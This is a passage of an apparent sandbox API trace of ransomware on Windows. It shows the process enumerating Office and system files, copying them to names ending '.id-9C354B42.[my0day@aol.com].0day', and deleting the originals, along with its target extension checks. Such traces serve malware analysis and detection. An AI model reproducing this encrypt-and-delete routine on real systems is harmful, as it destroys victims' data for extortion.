(lpString=".ppt") returned 4 [0267.812] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0267.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.812] lstrlenW (lpString=".zip") returned 4 [0267.812] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0267.812] lstrlenW (lpString=".rar") returned 4 [0267.812] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0267.812] lstrlenW (lpString=".bz2") returned 4 [0267.812] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0267.812] lstrlenW (lpString=".7z") returned 3 [0267.812] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0267.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.812] lstrlenW (lpString=".dbf") returned 4 [0267.812] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0267.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.812] lstrlenW (lpString=".1cd") returned 4 [0267.813] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0267.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPHPROXY.DLL") returned 68 [0267.813] lstrlenW (lpString=".jpg") returned 4 [0267.813] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0267.813] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0267.813] lstrlenW (lpString="OPTINPS.DLL") returned 11 [0267.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.814] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=18336) returned 1 [0267.814] CloseHandle (hObject=0x2f8) returned 1 [0267.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll")) returned 0x20 [0267.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0267.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\optinps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0267.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.814] lstrlenW (lpString=".doc") returned 4 [0267.814] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0267.814] lstrlenW (lpString=".docx") returned 5 [0267.814] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0267.814] lstrlenW (lpString=".pdf") returned 4 [0267.814] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0267.814] lstrlenW (lpString=".xls") returned 4 [0267.814] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0267.814] lstrlenW (lpString=".xlsx") returned 5 [0267.814] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0267.814] lstrlenW (lpString=".ppt") returned 4 [0267.814] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0267.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.814] lstrlenW (lpString=".zip") returned 4 [0267.815] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0267.815] lstrlenW (lpString=".rar") returned 4 [0267.815] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0267.815] lstrlenW (lpString=".bz2") returned 4 [0267.815] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0267.815] lstrlenW (lpString=".7z") returned 3 [0267.815] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0267.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.815] lstrlenW (lpString=".dbf") returned 4 [0267.815] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0267.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.815] lstrlenW (lpString=".1cd") returned 4 [0267.815] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0267.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.815] lstrlenW (lpString=".jpg") returned 4 [0267.815] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0267.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.815] lstrlenW (lpString=".doc") returned 4 [0267.815] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0267.815] lstrlenW (lpString=".docx") returned 5 [0267.815] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0267.815] lstrlenW (lpString=".pdf") returned 4 [0267.815] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0267.815] lstrlenW (lpString=".xls") returned 4 [0267.815] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0267.815] lstrlenW (lpString=".xlsx") returned 5 [0267.816] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0267.816] lstrlenW (lpString=".ppt") returned 4 [0267.816] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0267.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.816] lstrlenW (lpString=".zip") returned 4 [0267.816] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0267.816] lstrlenW (lpString=".rar") returned 4 [0267.816] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0267.816] lstrlenW (lpString=".bz2") returned 4 [0267.816] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0267.816] lstrlenW (lpString=".7z") returned 3 [0267.816] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0267.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.816] lstrlenW (lpString=".dbf") returned 4 [0267.816] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0267.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.816] lstrlenW (lpString=".1cd") returned 4 [0267.816] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0267.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\OPTINPS.DLL") returned 67 [0267.816] lstrlenW (lpString=".jpg") returned 4 [0267.816] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0267.816] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0267.816] lstrlenW (lpString="PJ11OD11.DLL") returned 12 [0267.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0267.939] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=752552) returned 1 [0267.939] CloseHandle (hObject=0x2f8) returned 1 [0267.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll")) returned 0x20 [0268.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0268.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0268.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.193] lstrlenW (lpString=".doc") returned 4 [0268.198] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0268.199] lstrlenW (lpString=".docx") returned 5 [0268.217] lstrcmpiW (lpString1=".docx", lpString2="1.DLL") returned -1 [0268.222] lstrlenW (lpString=".pdf") returned 4 [0268.224] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0268.227] lstrlenW (lpString=".xls") returned 4 [0268.236] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0268.239] lstrlenW (lpString=".xlsx") returned 5 [0268.241] lstrcmpiW (lpString1=".xlsx", lpString2="1.DLL") returned -1 [0268.251] lstrlenW (lpString=".ppt") returned 4 [0268.254] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0268.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.261] lstrlenW (lpString=".zip") returned 4 [0268.271] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0268.277] lstrlenW (lpString=".rar") returned 4 [0268.277] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0268.278] lstrlenW (lpString=".bz2") returned 4 [0268.278] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0268.278] lstrlenW (lpString=".7z") returned 3 [0268.278] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0268.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.278] lstrlenW (lpString=".dbf") returned 4 [0268.278] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0268.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.278] lstrlenW (lpString=".1cd") returned 4 [0268.278] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0268.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.278] lstrlenW (lpString=".jpg") returned 4 [0268.278] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0268.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.278] lstrlenW (lpString=".doc") returned 4 [0268.278] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0268.278] lstrlenW (lpString=".docx") returned 5 [0268.278] lstrcmpiW (lpString1=".docx", lpString2="1.DLL") returned -1 [0268.278] lstrlenW (lpString=".pdf") returned 4 [0268.278] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0268.278] lstrlenW (lpString=".xls") returned 4 [0268.279] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0268.279] lstrlenW (lpString=".xlsx") returned 5 [0268.279] lstrcmpiW (lpString1=".xlsx", lpString2="1.DLL") returned -1 [0268.279] lstrlenW (lpString=".ppt") returned 4 [0268.279] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0268.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.279] lstrlenW (lpString=".zip") returned 4 [0268.279] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0268.279] lstrlenW (lpString=".rar") returned 4 [0268.279] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0268.279] lstrlenW (lpString=".bz2") returned 4 [0268.279] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0268.279] lstrlenW (lpString=".7z") returned 3 [0268.279] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0268.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.279] lstrlenW (lpString=".dbf") returned 4 [0268.279] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0268.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.279] lstrlenW (lpString=".1cd") returned 4 [0268.279] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0268.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL") returned 68 [0268.279] lstrlenW (lpString=".jpg") returned 4 [0268.279] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0268.280] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4262fb8, Size=0x4000) returned 0x4262fb8 [0268.280] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0268.280] lstrlenW (lpString="msxactps.dll") returned 12 [0268.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0268.284] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=36864) returned 1 [0268.284] CloseHandle (hObject=0x2f8) returned 1 [0268.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll")) returned 0x20 [0268.519] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0268.519] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0268.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 56 [0268.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 56 [0268.520] lstrlenW (lpString=".doc") returned 4 [0268.520] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0268.520] lstrlenW (lpString=".docx") returned 5 [0268.520] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0268.520] lstrlenW (lpString=".pdf") returned 4 [0268.520] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0268.520] lstrlenW (lpString=".xls") returned 4 [0268.520] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0268.520] lstrlenW (lpString=".xlsx") returned 5 [0268.520] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0268.520] lstrlenW (lpString=".ppt") returned 4 [0268.520] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0268.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 56 [0268.520] lstrlenW (lpString=".zip") returned 4 [0268.520] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0268.520] lstrlenW (lpString=".rar") returned 4 [0268.520] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0268.520] lstrlenW (lpString=".bz2") returned 4 [0268.520] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0268.520] lstrlenW (lpString=".7z") returned 3 [0268.520] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0268.520] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 56 [0268.520] lstrlenW (lpString=".dbf") returned 4 [0268.520] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0269.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.503] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.503] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0269.504] GetLastError () returned 0x0 [0269.504] ReadFile (in: hFile=0x354, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x246a, lpOverlapped=0x0) returned 1 [0269.532] WriteFile (in: hFile=0x2cc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x2470, lpOverlapped=0x0) returned 1 [0269.535] ReadFile (in: hFile=0x354, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.535] WriteFile (in: hFile=0x2cc, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.535] SetEndOfFile (hFile=0x2cc) returned 1 [0269.535] CloseHandle (hObject=0x2cc) returned 1 [0269.535] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.535] SetEndOfFile (hFile=0x354) returned 1 [0269.776] CloseHandle (hObject=0x354) returned 1 [0269.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.030] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid")) returned 1 [0270.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.427] lstrlenW (lpString=".doc") returned 4 [0270.427] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.427] lstrlenW (lpString=".docx") returned 5 [0270.427] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.427] lstrlenW (lpString=".pdf") returned 4 [0270.427] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.427] lstrlenW (lpString=".xls") returned 4 [0270.427] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.427] lstrlenW (lpString=".xlsx") returned 5 [0270.427] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.427] lstrlenW (lpString=".ppt") returned 4 [0270.427] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.427] lstrlenW (lpString=".zip") returned 4 [0270.427] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.427] lstrlenW (lpString=".rar") returned 4 [0270.427] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.427] lstrlenW (lpString=".bz2") returned 4 [0270.427] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.427] lstrlenW (lpString=".7z") returned 3 [0270.427] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.427] lstrlenW (lpString=".dbf") returned 4 [0270.427] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.428] lstrlenW (lpString=".1cd") returned 4 [0270.428] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.428] lstrlenW (lpString=".jpg") returned 4 [0270.428] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.428] lstrlenW (lpString=".doc") returned 4 [0270.428] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.428] lstrlenW (lpString=".docx") returned 5 [0270.428] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.428] lstrlenW (lpString=".pdf") returned 4 [0270.428] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.428] lstrlenW (lpString=".xls") returned 4 [0270.428] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.428] lstrlenW (lpString=".xlsx") returned 5 [0270.428] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.428] lstrlenW (lpString=".ppt") returned 4 [0270.428] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.428] lstrlenW (lpString=".zip") returned 4 [0270.428] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.428] lstrlenW (lpString=".rar") returned 4 [0270.428] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.428] lstrlenW (lpString=".bz2") returned 4 [0270.428] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.428] lstrlenW (lpString=".7z") returned 3 [0270.428] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.429] lstrlenW (lpString=".dbf") returned 4 [0270.429] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.429] lstrlenW (lpString=".1cd") returned 4 [0270.429] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0270.429] lstrlenW (lpString=".jpg") returned 4 [0270.429] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.429] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.429] lstrlenW (lpString="FINCL_02.MID") returned 12 [0270.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0270.451] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=9318) returned 1 [0270.451] CloseHandle (hObject=0x38c) returned 1 [0270.451] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid")) returned 0x20 [0270.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0270.669] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.669] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.698] GetLastError () returned 0x0 [0270.698] ReadFile (in: hFile=0x354, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 